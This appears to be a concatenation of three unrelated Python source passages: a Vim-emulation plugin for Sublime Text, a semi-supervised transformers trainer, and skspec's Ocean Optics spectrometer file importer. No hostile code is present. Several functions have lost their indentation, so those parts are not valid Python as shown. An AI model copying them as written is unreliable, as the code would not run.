        visual selection. Returns the position at which text was pasted."""
        state = VintageState(self.view)
        if state.mode not in (MODE_VISUAL, MODE_VISUAL_LINE):
            # TODO: generate string first, then insert?
            # Make sure we can paste at EOF.
            at = at if at <= self.view.size() else self.view.size()
            for x in range(count):
                self.view.insert(edit, at, text)
            # Return position at which we have just pasted.
            return at
        else:
            if text.startswith('\n'):
                text = text * count
                if not text.endswith('\n'):
                    text = text + '\n'
            else:
                text = text * count

            if state.mode == MODE_VISUAL_LINE:
                if text.startswith('\n'):
                    text = text[1:]

            self.view.replace(edit, sel, text)
            # Return position at which we have just pasted.
            return sel.a
class ViPasteBefore(sublime_plugin.TextCommand):
    """Paste register contents before the caret (vim `P`)."""

    def run(self, edit, register=None, count=1):
        state = VintageState(self.view)

        if register:
            fragments = state.registers[register]
        else:
            # TODO: There should be a simpler way of getting the unnamed register's content.
            fragments = state.registers['"']

        sels = list(self.view.sel())
        # Map fragments 1:1 to selections when the counts match; otherwise paste
        # the first fragment at every selection.
        if len(sels) == len(fragments):
            sel_frag = zip(sels, fragments)
        else:
            sel_frag = zip(sels, [fragments[0],] * len(sels))

        offset = 0
        for s, text in sel_frag:
            if text.endswith('\n'):
                # Linewise paste: insert at the start of the caret's line.
                if utils.is_at_eol(self.view, s) or utils.is_at_bol(self.view, s):
                    self.paste_all(edit, s, self.view.line(s.b).a, text, count)
                else:
                    self.paste_all(edit, s, self.view.line(s.b - 1).a, text, count)
            else:
                # Charwise paste: shift by the text already inserted for
                # earlier selections.
                self.paste_all(edit, s, s.b + offset, text, count)
                offset += len(text) * count

    def paste_all(self, edit, sel, at, text, count):
        """Insert `text` `count` times at `at` (normal modes) or replace the visual selection."""
        # for x in range(count):
        #     self.view.insert(edit, at, text)
        state = VintageState(self.view)
        if state.mode not in (MODE_VISUAL, MODE_VISUAL_LINE):
            for x in range(count):
                self.view.insert(edit, at, text)
        else:
            # Visual replace: repeat the fragment and keep the linewise marker shape.
            if text.endswith('\n'):
                text = text * count
                if not text.startswith('\n'):
                    text = '\n' + text
            else:
                text = text * count
            self.view.replace(edit, sel, text)
class ViEnterNormalMode(sublime_plugin.TextCommand):
    """Switch the view to normal mode, tidying selections up first."""
    def run(self, edit):
        state = VintageState(self.view)

        if state.mode == MODE_VISUAL:
            state.store_visual_selections()

        # When returning from select mode, keep the non-Vintageous selections
        # just created -- unless only one remains.
        keep_select_mode_sels = (state.mode == MODE_SELECT and
                                 len(self.view.sel()) > 1)
        if not keep_select_mode_sels:
            self.view.run_command('collapse_to_direction')
            self.view.run_command('dont_stay_on_eol_backward')

        state.enter_normal_mode()
class ViEnterNormalModeFromInsertMode(sublime_plugin.TextCommand):
    """Leave insert mode: move carets one character back (vim <esc>) and enter normal mode."""
    def run(self, edit):
        old_sels = list(self.view.sel())
        self.view.sel().clear()

        for s in old_sels:
            if s.a > s.b:
                # Reversed region: leave it untouched.
                self.view.sel().add(s)
                continue
            # Step one character back unless the caret sits at the line start.
            pt = s.a if self.view.line(s.a).a == s.a else s.a - 1
            self.view.sel().add(sublime.Region(pt, pt))

        VintageState(self.view).enter_normal_mode()
        self.view.window().run_command('hide_auto_complete')
class ViEnterInsertMode(sublime_plugin.TextCommand):
    """Enter insert mode and collapse selections to plain carets."""
    def run(self, edit):
        VintageState(self.view).enter_insert_mode()
        self.view.run_command('collapse_to_direction')
class ViEnterVisualMode(sublime_plugin.TextCommand):
    """Enter visual mode, ensuring each selection spans at least one character."""
    def run(self, edit):
        VintageState(self.view).enter_visual_mode()
        self.view.run_command('extend_to_minimal_width')
class ViEnterVisualBlockMode(sublime_plugin.TextCommand):
    """Enter visual block mode with a single selection."""
    def run(self, edit):
        # Handling multiple visual blocks seems quite hard, so keep only the
        # first selection before switching modes.
        sels = self.view.sel()
        first = list(sels)[0]
        sels.clear()
        sels.add(first)

        VintageState(self.view).enter_visual_block_mode()
        self.view.run_command('extend_to_minimal_width')
class ViEnterSelectMode(sublime_plugin.TextCommand):
    """Switch the view into select mode."""
    def run(self, edit):
        VintageState(self.view).enter_select_mode()
class ViEnterVisualLineMode(sublime_plugin.TextCommand):
    """Switch the view into visual line mode."""
    def run(self, edit):
        VintageState(self.view).enter_visual_line_mode()
class ViEnterReplaceMode(sublime_plugin.TextCommand):
    """Switch into replace mode (vim R) and clear any pending command data."""
    def run(self, edit):
        vi_state = VintageState(self.view)
        vi_state.enter_replace_mode()
        self.view.run_command('collapse_to_direction')
        vi_state.reset()
class SetAction(IrreversibleTextCommand):
    """Store the pending action on the Vintageous state and try to evaluate it."""
    def __init__(self, view):
        IrreversibleTextCommand.__init__(self, view)

    def run(self, action):
        vi_state = VintageState(self.view)
        vi_state.action = action
        vi_state.eval()
class SetMotion(IrreversibleTextCommand):
    """Store the pending motion on the Vintageous state and try to evaluate it."""
    def __init__(self, view):
        IrreversibleTextCommand.__init__(self, view)

    def run(self, motion):
        vi_state = VintageState(self.view)
        vi_state.motion = motion
        vi_state.eval()
class ViPushDigit(sublime_plugin.TextCommand):
    """Append a digit to the count of the pending motion or action."""
    def run(self, edit, digit):
        vi_state = VintageState(self.view)
        # No pending action or motion yet: the digit belongs to the motion count.
        if not (vi_state.action or vi_state.motion):
            vi_state.push_motion_digit(digit)
        elif vi_state.action:
            vi_state.push_action_digit(digit)
class ViReverseCaret(sublime_plugin.TextCommand):
    """Swap the endpoints of every selection (like vim's 'o' in visual mode)."""
    def run(self, edit):
        old_sels = list(self.view.sel())
        self.view.sel().clear()
        self.view.sel().add_all([sublime.Region(s.b, s.a) for s in old_sels])
class ViEnterNormalInsertMode(sublime_plugin.TextCommand):
    """Start an insert that will later be repeated <count> times (e.g. 5i)."""
    def run(self, edit):
        VintageState(self.view).enter_normal_insert_mode()
        # FIXME: We can't repeat 5ifoo<esc>
        # Group the upcoming typed text into a single undo step.
        self.view.run_command('mark_undo_groups_for_gluing')
# ...User types text...
class ViRunNormalInsertModeActions(sublime_plugin.TextCommand):
    """Finish a <count>i... insert by replaying the typed text count-1 times."""
    def run(self, edit):
        state = VintageState(self.view)
        # We've recorded what the user has typed into the buffer. Turn macro recording off.
        self.view.run_command('glue_marked_undo_groups')

        # FIXME: We can't repeat 5ifoo<esc> after we're done.
        for _ in range(state.count - 1):
            self.view.run_command('repeat')

        # Ensure the count will be deleted, then delete it.
        state.mode = MODE_NORMAL
        state.reset()
        self.view.run_command('vi_enter_normal_mode_from_insert_mode')
class SetRegister(sublime_plugin.TextCommand):
    """Select the register the next yank/paste should use."""
    def run(self, edit, character=None):
        state = VintageState(self.view)
        if character is None:
            # First key press: wait for the register name.
            state.expecting_register = True
        elif character not in (REG_EXPRESSION,):
            state.register = character
            state.expecting_register = False
        else:
            # Expression register: prompt for a Python expression instead.
            self.view.run_command('vi_expression_register')
class ViExpressionRegister(sublime_plugin.TextCommand):
    """Prompt for a Python expression and store or insert its result (vim's "= register)."""

    def run(self, edit, insert=False, next_mode=None):
        def on_done(s):
            state = VintageState(self.view)
            try:
                # SECURITY NOTE(review): eval() of user-typed text. Acceptable
                # here because the user explicitly invoked the expression
                # register, but never route untrusted input through this command.
                rv = [str(eval(s, None, None)),]
                if not insert:
                    # TODO: We need to sort out the values received and sent to registers. When pasting,
                    # we assume a list... This should be encapsulated in Registers.
                    state.registers[REG_EXPRESSION] = rv
                else:
                    self.view.run_command('insert_snippet', {'contents': str(rv[0])})
                    state.reset()
            except:
                # NOTE(review): bare except deliberately catches any evaluation
                # failure (syntax errors, runtime errors) and aborts quietly.
                sublime.status_message("Vintageous: Invalid expression.")
                on_cancel()

        def on_cancel():
            state = VintageState(self.view)
            state.reset()

        self.view.window().show_input_panel('', '', on_done, None, on_cancel)
class _vi_m(sublime_plugin.TextCommand):
    """Set mark `character` at the current position (vim m{a-z})."""
    def run(self, edit, character=None):
        VintageState(self.view).marks.add(character, self.view)
class _vi_quote(sublime_plugin.TextCommand):
def run(self, edit, mode=None, character=None, extend=False):
def f(view, s):
if mode == MODE_VISUAL:
if s.a <= s.b:
if address.b < s.b:
return sublime.Region(s.a + 1, address.b)
else:
return sublime.Region(s.a, address.b)
else:
return sublime.Region(s.a + 1, address.b)
elif mode == MODE_NORMAL:
return address
elif mode == _MODE_INTERNAL_NORMAL:
return sublime.Region(s.a, address.b)
return s
state = VintageState(self.view)
address = state.marks.get_as_encoded_address(character)
if address is None:
return
if isinstance(address, str):
if not address.startswith('<command'):
self.view.window().open_file(address, sublime.ENCODED_POSITION)
else:
# We get a command in this form: <command _vi_double_quote>
self.view.run_command(address.split(' ')[1][:-1])
return
# This is a motion in a composite command.
| |
import torch
from torch.utils.data.dataloader import DataLoader
from torch.utils.data.sampler import RandomSampler, SequentialSampler
from transformers import Trainer
from .dataset_utils import SimpleDataset, extract_keys
import gc
import inspect
import datasets
from torch.optim.lr_scheduler import MultiplicativeLR
from copy import deepcopy
from typing import Optional
from torch.optim import Optimizer
from transformers.trainer_callback import TrainerState
from transformers.trainer_pt_utils import nested_detach
def get_linear_schedule_with_minlr(optimizer: Optimizer, num_warmup_steps: int,
                                   num_training_steps: int, last_epoch: int = -1,
                                   min_lr: float = 1e-07):
    """
    Creates a scheduler with a learning rate that linearly decreases but saturates
    at the ``min_lr`` value.

    Args:
        optimizer (:class:`~torch.optim.Optimizer`):
            The optimizer for which to schedule the learning rate.
        num_warmup_steps (:obj:`int`):
            The number of steps for the warmup phase.
            NOTE(review): currently unused by this schedule; kept for interface
            compatibility with the other ``get_*_schedule`` helpers.
        num_training_steps (:obj:`int`):
            The total number of training steps.
        last_epoch (:obj:`int`, `optional`, defaults to -1):
            The index of the last epoch when resuming training.
        min_lr (:obj:`float`, `optional`, defaults to 1e-07):
            The value of minimum learning rate where it should saturate.

    Return:
        :obj:`torch.optim.lr_scheduler.MultiplicativeLR` with the appropriate schedule.
    """
    init_lr = optimizer.defaults['lr']

    def lr_lambda(current_step: int):
        # Remaining steps. The per-step factor steps_done / (steps_done + 1)
        # telescopes, so the cumulative multiplicative factor decays linearly.
        steps_done = float(num_training_steps - current_step)
        if current_step > 1:
            mul_fac = steps_done / max(steps_done + 1, 1)
        else:
            mul_fac = steps_done / (num_training_steps)
        # Saturate: once the decayed lr would fall below min_lr, return a
        # factor of 1 so the current lr stays unchanged.
        if mul_fac * init_lr > min_lr:
            return mul_fac
        else:
            return 1
    return MultiplicativeLR(optimizer, lr_lambda, last_epoch)
class RemoveUnusedColumnMixing:
    """Mixin replacing ~transformers.Trainer._remove_unused_columns.

    The wrapped semi-supervised models expose the real forward() signature on
    ``model.teacher`` (MeanTeacher / NoisyStudent) or ``model.pretrained_model``
    rather than on ``model`` itself, so the signature is inspected there.
    """

    def _remove_unused_columns(self, dataset: "datasets.Dataset", description: Optional[str] = None):
        """Restrict `dataset` to the columns accepted by the underlying model's forward()."""
        if not self.args.remove_unused_columns:
            return

        # Pick the module whose forward() signature defines the accepted arguments.
        if self.model.type_ in ('MeanTeacher', 'NoisyStudent'):
            forward_fn = self.model.teacher.forward
        else:
            forward_fn = self.model.pretrained_model.forward

        accepted = list(inspect.signature(forward_fn).parameters.keys())
        # Labels may be named label or label_ids; the default data collator handles that.
        accepted += ["label", "label_ids"]

        keep = [col for col in accepted if col in dataset.column_names]
        dataset.set_format(type=dataset.format["type"], columns=keep)
class UWScheduler:
    """
    Unsupervised weights scheduler for changing the unsupervised weight
    of the semi supervised learning models. Also contains methods for any
    other kinds of variable updates required by the models, e.g.
    PiModel, TemporalEnsembling, and MeanTeacher. It wraps (composes with)
    a pytorch learning-rate scheduler so it can stand in for one inside
    ~transformers.Trainer without rewriting the train method.
    # TODO: cleaner version with the rewritten Trainer.train method.

    Args:
        lr_scheduler (:obj:`torch.optim.lr_scheduler`): Learning scheduler object.
        trainer (:obj:`~TrainerWithUWScheduler`): Trainer object.
        unsup_start_epochs (:obj:`int`): value of epoch at which the unsupervised
            weights should start updating.
        max_w (:obj:`float`): maximum value of weight that the unsup_weight from model
            could reach.
        update_teacher_steps (:obj:`int`): useful for MeanTeacher, sets the interval after
            which teacher variables should be updated. Falsy values mean
            "once per epoch".
        w_ramprate (:obj:`float`): linear rate at which the unsupervised weight would be
            increased from the initial value.
        update_weights_steps (:obj:`int`): interval steps after which unsupervised weight
            would be updated by the w_ramprate.

    Class attributes:
        -**steps_in_epoch**: Number of steps (batch passes) in an epoch.
        -**local_step**: keeps track of the times unsupervised weight has been changed.
    """
    def __init__(self, lr_scheduler, trainer, unsup_start_epochs=0, max_w=1,
                 update_teacher_steps=False, w_ramprate=1, update_weights_steps=1):
        self.trainer = trainer
        self.lr_scheduler = lr_scheduler
        self.local_step = 0
        self.max_w = max_w
        self.unsup_start_epochs = unsup_start_epochs
        self.update_weights_steps = update_weights_steps
        self.w_ramprate = w_ramprate
        # Floor division: a trailing partial batch is not counted as a step.
        self.steps_in_epoch = len(self.trainer.train_dataset) // self.trainer.args.train_batch_size
        # Falsy update_teacher_steps defaults to once per epoch.
        self.update_teacher_steps = update_teacher_steps if update_teacher_steps else self.steps_in_epoch

    def step(self):
        """
        Implementation of composition of the pytorch learning rate scheduler step function
        with the schedule of unsupervised weights. Also updates the memory logits
        for TemporalEnsembleModel and the teacher variables for MeanTeacher.
        """
        self.lr_scheduler.step()
        # Ramp the unsupervised weight linearly once past the warm-up epochs,
        # capped at max_w.
        if self.trainer.state.epoch > self.unsup_start_epochs and self.is_true(self.update_weights_steps):
            self.trainer.model.unsup_weight = min(self.max_w,
                                                  self.w_ramprate
                                                  * (self.local_step - self.unsup_start_epochs))
        # Model-specific per-interval hooks.
        if self.trainer.model.type_ == "TemporalEnsembleModel" and self.is_true(self.steps_in_epoch):
            self.trainer.model.update_memory_logits(int(self.trainer.state.epoch + 1))
        if self.trainer.model.type_ == "MeanTeacher" and self.is_true(self.update_teacher_steps):
            self.trainer.model.update_teacher_variables()
        self.local_step += 1

    def is_true(self, value):
        """
        Return True when the trainer's global step marks the end of an
        interval of length `value` (and at least one step has been taken).
        """
        return (self.trainer.state.global_step and (self.trainer.state.global_step + 1) % value == 0)

    def __getattr__(self, name):
        """
        Delegate any attribute not found on this wrapper to the wrapped
        lr_scheduler. Needed for the calls from ~transformers.Trainer.train().
        """
        return getattr(self.lr_scheduler, name)
class TrainerWithUWScheduler(RemoveUnusedColumnMixing, Trainer):
    """
    Subclass of ~transformers.Trainer with minimal code change and integration
    with the unsupervised weight scheduler (UWScheduler).

    Args:
        kwargs_uw: dictionary of arguments for UWScheduler; when falsy, the
            UWScheduler arguments are extracted from ``kwargs`` instead.
        kwargs: arguments for ~transformers.Trainer. The training data may be
            passed either as 'train_dataset' (Trainer's naming) or as
            'dataset' (naming scheme of dataset_utils.modify_datasets), in
            which case its "train" split is used.
    """
    def __init__(self, kwargs_uw=None, *args, **kwargs):
        # Fall back to pulling the UWScheduler arguments out of the Trainer kwargs.
        self.kwargs_uw = kwargs_uw if kwargs_uw else extract_keys(UWScheduler, kwargs)

        dataset = kwargs.pop('dataset', None)
        if dataset:
            kwargs['train_dataset'] = dataset["train"]

        super().__init__(*args, **kwargs)
        self.check_for_consistency()

    def create_optimizer_and_scheduler(self, num_training_steps):
        """Create optimizer/scheduler, then wrap the lr scheduler with UWScheduler."""
        super().create_optimizer_and_scheduler(num_training_steps)
        self.lr_scheduler = UWScheduler(self.lr_scheduler, self, **self.kwargs_uw)

    def get_train_dataloader(self):
        """
        Sequential (not random) sampling: the semi-supervised models require
        that labeled and unlabeled examples are not mixed within a minibatch.
        """
        return DataLoader(
            self.train_dataset,
            batch_size=self.args.train_batch_size,
            sampler=SequentialSampler(self.train_dataset),
            collate_fn=self.data_collator,
            drop_last=self.args.dataloader_drop_last,
            num_workers=self.args.dataloader_num_workers,
        )

    def check_for_consistency(self):
        """
        Raise RuntimeError if any full minibatch would contain both labeled
        (label >= 0) and unlabeled (label < 0) examples.
        """
        labels = torch.tensor(self.train_dataset['label'])
        batch_size = self.args.per_device_train_batch_size
        for start in range(0, (len(labels) // batch_size) * batch_size, batch_size):
            batch_labels = labels[start: start + batch_size]
            if not (all(batch_labels >= 0) or all(batch_labels < 0)):
                raise RuntimeError('Mixing of labeled and unlabeled examples is not allowed.')
class BaseForMMTrainer(RemoveUnusedColumnMixing, Trainer):
"""
Base class for all the mutimodel trainers. This class contains
the methods which are used by the Trainers which helps in training
the semi supervised way which have mutiple models .
"""
def get_dataloader(self, dataset, sequential=False):
"""
Slightly changed ~transformers.Trainer.get_train_dataloader
with the flexibility to change between sequential and RandomSampler.
"""
if sequential is True:
sampler = SequentialSampler(dataset)
else:
sampler = RandomSampler(dataset)
return DataLoader(
dataset,
batch_size=self.args.train_batch_size,
sampler=sampler,
collate_fn=self.data_collator,
drop_last=self.args.dataloader_drop_last,
num_workers=self.args.dataloader_num_workers,
)
def pre_train_init(self, num_training_steps):
"""
Collection of all the callback functions called before initializing
the training. See ~transformers.Trainer.train() for more details.
Args:
num_training_steps (:obj:`int`): total number of training which are
calculated by number of mini batches per epoch * number of epochs.
"""
self.state = TrainerState()
self.create_optimizer_and_scheduler(num_training_steps)
if self.use_min_lr_scheduler is not None:
self.lr_scheduler = get_linear_schedule_with_minlr(self.optimizer,
num_warmup_steps=self.args.warmup_steps,
num_training_steps=num_training_steps,
min_lr=self.min_lr)
self.callback_handler.model = self.model
self.callback_handler.optimizer = self.optimizer
self.callback_handler.lr_scheduler = self.lr_scheduler
self.control = self.callback_handler.on_train_begin(self.args, self.state, self.control)
self._total_loss_scalar = 0.0
self._globalstep_last_logged = self.state.global_step
    def post_epoch(self, step, epoch, tr_loss):
        """
        Collection of all the callback functions called after an optimisation
        step. See ~transformers.Trainer.train() for more details.

        NOTE(review): despite the name, this runs per step (it fires
        on_step_end and steps the optimizer) -- confirm intended usage.

        Args:
            step (:obj:`int`): step number, number of steps passed out of
                num_training_steps used in pre_train_init method.
            epoch (:obj:`int`): epoch passed.
            tr_loss (:obj:`float`): training loss.
        """
        # Clip gradients, apply them, advance the lr schedule, reset grads.
        torch.nn.utils.clip_grad_norm_(self.model.parameters(), self.args.max_grad_norm)
        self.optimizer.step()
        self.lr_scheduler.step()
        self.model.zero_grad()
        # Advance trainer bookkeeping; fractional epoch for logging.
        # NOTE(review): assumes self.global_epoch and self.steps_in_epoch are
        # set by the concrete trainer before training -- confirm.
        self.state.global_step += 1
        self.state.epoch = self.global_epoch + epoch + (step + 1) / self.steps_in_epoch
        self.control = self.callback_handler.on_step_end(self.args, self.state, self.control)
        self._maybe_log_save_evaluate(tr_loss, self.model, trial=None, epoch=epoch)
def equate_lengths(self, model1_train, model2_train):
"""
A method useful for CoTrain, TriTrain model training. It finds
whichever model dataset has less training examples and then
equates them using SimpleDataset.extend_length method
Args:
model1_train (:obj:`SimpleDataset`): Training dataset for model 1.
model2_train (:obj:`SimpleDataset`): Training dataset for model 2.
"""
if len(model1_train) > len(model2_train):
model2_train.extend_length(len(model1_train))
elif len(model2_train) > len(model1_train):
model1_train.extend_length(len(model2_train))
    def confi_prediction(self, logits_m1, logits_m2, logits_m3=None):
        """
        Prediction based on the confidence of the models: for each example the
        output row is taken from whichever model has the highest maximum logit.

        Note: overlapping (tied) rows are overwritten in assignment order
        (m3, then m1, then m2), so on a tie model 2 wins over model 1, which
        wins over model 3.

        Args:
            logits_m1 (:obj:`torch.FloatTensor`): logits received from model 1.
            logits_m2 (:obj:`torch.FloatTensor`): logits from model 2.
            logits_m3 (:obj:`torch.FloatTensor`, `optional`): logits from model 3.

        Returns:
            :obj:`torch.FloatTensor` with the per-example selected logits.
        """
        # Max logit per example acts as the model's "confidence"; the argmax
        # labels returned by torch.max are unused here.
        p_label1, labels1 = torch.max(logits_m1, 1)
        p_label2, labels2 = torch.max(logits_m2, 1)
        logits_out = torch.zeros(logits_m1.size(), device=logits_m1.device)
        if logits_m3 is None:
            m1_confi = p_label1 >= p_label2
            m2_confi = p_label2 >= p_label1
        else:
            p_label3, labels3 = torch.max(logits_m3, 1)
            # A model is "confident" when its max logit is >= both others.
            m1_confi = torch.logical_and(p_label1 >= p_label2, p_label1 >= p_label3)
            m2_confi = torch.logical_and(p_label2 >= p_label1, p_label2 >= p_label3)
            m3_confi = torch.logical_and(p_label3 >= p_label1, p_label3 >= p_label2)
            logits_out[m3_confi, :] = logits_m3[m3_confi, :]
        # Later assignments overwrite earlier ones on tied rows (see docstring).
        logits_out[m1_confi, :] = logits_m1[m1_confi, :]
        logits_out[m2_confi, :] = logits_m2[m2_confi, :]
        return logits_out
def prediction_step(
self,
model,
inputs,
prediction_loss_only,
ignore_keys=None,
):
"""
Slightly changed ~transformers.Trainer.prediction_step using
confi_prediction method to find prediction of Cotrain and TriTrain Models.
| |
<filename>skspec/IO/gwu_interfaces.py
''' Utilities for converting various file formats to a skspec TimeSpectra.
To convert a list of raw files, use from_spec_files()
To convert old-style timefile/spectral data file, use from_timefile_datafile()
To convert spectral datafiles from Ocean Optics USB2000 and USB650, pas file list in
from_spec_files.
Returns a skspec TimeSpectra with custom attributes "metadata", "filedict", "baseline".
'''
__author__ = "<NAME>, <NAME>"
__copyright__ = "Copyright 2012, GWU Physics"
__license__ = "Free BSD"
__maintainer__ = "<NAME>"
__email__ = "<EMAIL>"
__status__ = "Development"
import os
# 3RD Party Imports
from pandas import DataFrame, Series, datetime, read_csv, concat
import numpy as np
# skspec imports
from skspec.core.timespectra import TimeSpectra
from skspec.core.specindex import SpecIndex
from skspec.core.file_utils import get_files_in_dir, get_shortname
import logging
logger = logging.getLogger(__name__)
### Verified Ocean Optics month naming conventions. Spectra Suite capitalizes
### the abbreviation, so callers look up with month.lower(). ###
spec_suite_months={'jan':1,
                   'feb':2,
                   'mar':3,
                   'apr':4,
                   'may':5,
                   'jun':6,
                   'jul':7,
                   'aug':8,
                   'sep':9,
                   'oct':10,
                   'nov':11,
                   'dec':12}

# Record layout of one row in an Ocean Optics spectral data file.
spec_dtype = np.dtype([ ('wavelength', float), ('intensity', float) ])
def get_shortname(filepath, cut_extension=False):
''' simply get the filename of fullpath. Cut extension will remove file extension'''
shortname = os.path.basename(filepath)
if cut_extension:
shortname = os.path.splitext(shortname)[0]
return shortname
### Following two functions are utilized by both data interfacing functions. ###
def extract_darkfile(filelist, return_null=True):
''' Attempts to pick out a dark file from a list using string matching. Handling of darkfile
is done by other functions. Opted to raise errors and warnings here, instead of downstream.
If return_null: it will return none if no dark file is found. Otherwise it will raise an error.'''
darkfiles=[]
for infile in filelist:
if "dark" in infile.lower() or "drk" in infile.lower():
darkfiles.append(infile)
### If not darkfiles found, return null or raise ###
if len(darkfiles)==0:
if return_null:
return None
else:
raise Warning("WARNING: Darkfile not found in filelist: \
startfile %s - endfile %s"%(filelist[0], filelist[-1]))
### If multiple darkfiles found, RAISE a warning ###
elif len(darkfiles)>1:
raise Warning("Multiple darkfiles founds in filelist: \
startfile %s - endfile %s"%(filelist[0], filelist[-1]))
else:
return darkfiles[0]
def get_headermetadata_dataframe(dataframe, time_file_dict, name=''):
''' After creation of the dataframe and datetime-to-file dic, various metadata attributes
come together like filecount, filestart, filend etc...
**run title becomes name of dataframe and can be adopted by plots'''
filecount=len(dataframe.columns)
timestart, timeend=dataframe.columns[0], dataframe.columns[-1]
filestart, fileend=time_file_dict[timestart], time_file_dict[timeend]
specstart, specend=dataframe.index[0], dataframe.index[-1]
return {'filecount':filecount,
'timestart':timestart,
'timeend':timeend,
'filestart':filestart,
'fileend':fileend,
'specstart':specstart,
'specend':specend}
##########################################################
### Below are the 2 main functions to extract the data ###
##########################################################
def from_spec_files(file_list, name='', skiphead=17, skipfoot=1, check_for_overlapping_time=True, extract_dark=True):
''' Takes in raw files directly from Ocean optics USB2000 and USB650 spectrometers and returns a
skspec TimeSpectra. If spectral data stored without header, can be called with skiphead=0.
Parameters
----------
name: Set name of returned TimeSpectra.
check_for_overlapping_time: will raise errors if any files have identical times. Otherwise, time
is overwritten. Really only useful for testing or otherwise cornercase instances.
extract_dark: Attempt to find a filename with caseinsenstive string match to "dark". If dark spectrum
not found, will print warning. If multiple darks found, will raise error.
skiphead/skipfoot: Mostly for reminder that this filetype has a 17 line header and a 1 line footer.
Notes
-----
Built to work with 2-column data only!!!
Dataframe is constructed from a list of dictionaries.
Each dataframe gets an appended headerdata attribute (dataframe.headerdata) which is a dictionary,
keyed by columns and stores (infile, header, footer) data so no info is lost between files.
Constructed to work for non-equally spaced datafiles, or non-identical data (aka wavelengths can have nans).
'''
dict_of_series={} #Dict of series eventually merged to dataframe
time_file_dict={} #Dict of time:filename (darkfile intentionally excluded)
_overlap_count = 0 # Tracks if overlapping occurs
### If looking for a darkfile, this will find it. Bit redundant but I'm lazy..###
if extract_dark:
darkfile=extract_darkfile(file_list, return_null=True)
if darkfile:
with open(darkfile) as f:
header=[f.next().strip() for x in xrange(skiphead)]
wavedata=np.genfromtxt(darkfile, dtype=spec_dtype, skip_header=skiphead, skip_footer=skipfoot)
darktime=_get_datetime_specsuite(header)
baseline=Series(wavedata['intensity'], index=wavedata['wavelength'], name=darkfile)
file_list.remove(darkfile)
f.close()
else:
baseline=None
file_list = [f for f in file_list
if os.path.basename(f) != '.gitignore']
for infile in file_list:
###Read in only the header lines, not all the lines of the file
###Strips and splits in one go
with open(infile) as f:
header=[f.next().strip() for x in xrange(skiphead)]
#Store wavelength, intensity data in a 2-column datatime for easy itemlookup
#Eg wavedata['wavelength']
wavedata=np.genfromtxt(infile, dtype=spec_dtype, skip_header=skiphead, skip_footer=skipfoot)
# Extract time data from header
datetime=_get_datetime_specsuite(header)
if datetime in time_file_dict:
_overlap_count += 1
# Make sure timepoints aren't overlapping with any others
if check_for_overlapping_time and _overlap_count:
raise IOError('Duplicate time %s found in between files %s, %s.'
' To overwrite, set check_for_overlapping_time = False.'
%( datetime, infile, time_file_dict[datetime] ))
time_file_dict[datetime]=infile
dict_of_series[datetime]=Series(wavedata['intensity'], index=wavedata['wavelength'])
f.close()
# Make timespec, add filenames, baseline and metadata attributes (note, DateTimeIndex auto sorts!!)
df = DataFrame(dict_of_series) #Dataframe beacuse TS doesn't handle dict of series
print df.columns
timespec = TimeSpectra(df, name=name)
timespec.specunit = 'nm'
timespec.filedict = time_file_dict
timespec.baseline = baseline #KEEP THIS AS DARK SERIES RECALL IT IS SEPARATE FROM reference OR REFERENCE..
# Take metadata from first file in filelist that isn't darkfile
for infile in file_list:
if infile != darkfile:
with open(infile) as f:
header=[f.next().strip() for x in xrange(skiphead)]
meta_partial=_get_metadata_fromheader(header)
break
meta_general=get_headermetadata_dataframe(timespec, time_file_dict)
meta_general.update(meta_partial)
timespec.metadata=meta_general
if _overlap_count:
logger.warn('Time duplication found in %s of %s files. Duplicates were '
'removed!' % (_overlap_count, len(file_list)))
return timespec
def _get_datetime_specsuite(specsuiteheader):
''' Special, Ocean-optics specific function to get date information from a their customized header.'''
dateline=specsuiteheader[2].split()
year, month, day=int(dateline[6]), dateline[2], int(dateline[3])
month=spec_suite_months[month.lower()]
hrs, mins, secs=dateline[4].split(':')
hrs=int(hrs) ; mins=int(mins) ; secs=int(secs)
return datetime(year, month, day, hrs, mins, secs)
def _get_metadata_fromheader(specsuiteheader):
''' Populates metadata attributes from the speactrasuite datafile header'''
sh=specsuiteheader #for ease in calling
return {'dark_spec_pres':sh[4].split()[3], 'spectrometer':sh[7].split()[1],
'int_unit':sh[8].split()[2], 'int_time':int(sh[8].split()[3]),
'spec_avg':int(sh[9].split()[2]), 'boxcar':int(sh[10].split()[2]),
'ref_spec_pres':sh[5].split()[3], 'electric_dark_correct':sh[11].split()[4],
'strobe_lamp':sh[12].split()[2],'detector_nonlin_correct':sh[13].split()[4],
'stray_light_correct':sh[14].split()[4], 'pix_in_spec':int(sh[15].split()[6])}
######### Get dataframe from timefile / datafile #####
# Authors <NAME>/<NAME>, 10/15/12
def from_timefile_datafile(datafile, timefile, extract_dark=True, name=''):
''' Converts old-style spectral data from GWU phys lab into
a dataframe with timestamp column index and wavelength row indicies.
Creates the DataFrame from a dictionary of Series, keyed by datetime.
**name becomes name of dataframe'''
tlines=open(timefile,'r').readlines()
tlines=[line.strip().split() for line in tlines]
tlines.pop(0)
time_file_dict=dict((_get_datetime_timefile(tline),tline[0]) for tline in tlines)
### Read in data matrix, separate first row (wavelengths) from the rest of the data
wavedata=np.genfromtxt(datafile, dtype='float', skip_header=1)
data, wavelengths=wavedata[:,1::], wavedata[:,0] #Separate wavelength column
### Sort datetimes here before assigning/removing dark spec etc...
sorted_tfd=sorted(time_file_dict.items())
sorted_times, sorted_files=zip(*( (((i[0]), (i[1])) for i in sorted_tfd)))
### Seek darkfile. If found, take it out of dataframe. ###
if extract_dark:
darkfile=extract_darkfile(sorted_files, return_null=True)
if darkfile:
####Find baseline by reverse lookup (lookup by value) and get index position
#darkindex, darktime=[(idx, time) for idx, (time, afile) in enumerate(sorted_tfd) if afile == darkfile][0]
darkindex=sorted_files.index(darkfile)
darktime=sorted_times[darkindex]
baseline=Series(data[:,darkindex], index=wavelengths, name=darkfile)
del time_file_dict[darktime] #Intentionally remove
sorted_times=list(sorted_times) #Need to do in two steps
sorted_times.remove(darktime)
data=np.delete(data, darkindex, 1) #Delete dark column from numpy data
else:
baseline=None
dataframe=TimeSpectra(data, columns=sorted_times, index=wavelengths)
### Add field attributes to dataframe
dataframe.baseline=baseline
dataframe.filedict=time_file_dict
if name:
dataframe.name=name
### Get headermeta data from first line in timefile that isn't darkfile. Only checks one line
### Does not check for consistency
for line in tlines:
if line[0]==darkfile:
pass
else:
meta_partial=_get_headermetadata_timefile(line[0]) #DOUBLE CHECK THIS WORKS
break
### Extract remaining metadata (file/time info) and return ###
meta_general=get_headermetadata_dataframe(dataframe, time_file_dict)
meta_general.update(meta_partial)
dataframe.metadata=meta_general
dataframe.specunit='nm' #This autodetected in plots
